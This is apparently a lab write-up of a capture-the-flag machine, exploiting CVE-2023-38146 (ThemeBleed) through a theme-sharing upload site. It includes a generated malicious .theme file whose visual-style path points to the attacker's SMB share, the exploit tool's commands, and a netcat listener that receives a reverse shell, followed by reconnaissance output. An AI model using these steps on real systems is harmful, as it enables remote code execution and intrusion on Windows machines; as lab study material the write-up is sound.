CVE-2023-38146

The target web server is hosting a web application designed for sharing Windows 11 themes, featuring a file uploading capability. This functionality seems to involve a sequence of file executions for testing before integration into the website. Older iterations of Windows 11 are susceptible to a remote code execution vulnerability identified as [[Aero_CVE-2023-38146#[CVE-2023-38146](https //nvd.nist.gov/vuln/detail/CVE-2023-38146)|CVE-2023-38146]], stemming from issues within the themes component. While the exact version details of the target system remain unconfirmed, it appears prudent to explore the potential exploitation of CVE-2023-38146 given its relatively recent nature.

The exploit package only includes a DLL payload to launch calc.exe for PoC, I have created and compile a custom DLL payload that invokes a reverse shell

ps c:\Users\admin\Desktop\ThemeBleed> .\ThemeBleed.exe
usage: ThemeBleed.exe <command>
 
commands:
        server                                   - Runs the server
        make_theme <host> <output path>          - Generates a .theme file referencing the specified host
        make_themepack <host> <output_path>      - Generates a .themepack file referencing the specified host

The [[Aero_CVE-2023-38146#[Exploit](https //github.com/gabe-k/themebleed)|exploit package]] includes a binary specifically designed for Windows, named ThemeBleed.exe. Switching to a Windows host is required to execute this exploit successfully. Additionally, the executable mainly supports 2 features;

server to start a SMB server to host payloads in the data directory
make_theme/make_themepack to generate .theme/.themepack file pointing to the specified host

ps c:\Users\admin\Desktop\ThemeBleed> .\ThemeBleed.exe make_theme 10.10.14.4 myTheme.theme
 
ps c:\Users\admin\Desktop\ThemeBleed> cat .\myTheme.theme
; windows 11 theme exploit
; copyright 2023 fukin software foundation
 
[Theme]
DisplayName=@%SystemRoot%\System32\themeui.dll,-2060
 
[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0
WallpaperStyle=10
 
[VisualStyles]
Path=\\10.10.14.4\test\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
 
[MasterThemeSelector]
MTSM=RJSPBS

I will first generate a .theme file, pointing to 10.10.14.4, which is my current IP address The content indeed contains a UNC path to the specified host

ps c:\Users\admin\Desktop\ThemeBleed> .\ThemeBleed.exe server
Server started

Starting the SMB server

Uploading the myTheme.theme file

ps c:\Users\admin\Desktop\ThemeBleed> .\nc64.exe -nlvp 9999
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.237] 64090
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
 whoami
aero\sam.emerson
 
c:\Windows\system32> hostname
 hostname
aero
 
c:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::177
   ipv6 address. . . . . . . . . . . : dead:beef::5aa2:a858:ac20:b1e7
   temporary ipv6 address. . . . . . : dead:beef::9d34:25ac:aeff:695a
   link-local ipv6 address . . . . . : fe80::f370:3a1d:f4c0:2fa%14
   ipv4 address. . . . . . . . . . . : 10.10.11.237
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%14
                                       10.10.10.2

Initial Foothold established to the target system as the sam.emerson user via exploiting CVE-2023-38146

InfoSec LAB

Explorer

Aero_Exploitation

CVE-2023-38146

Interactive Graph View

Backlinks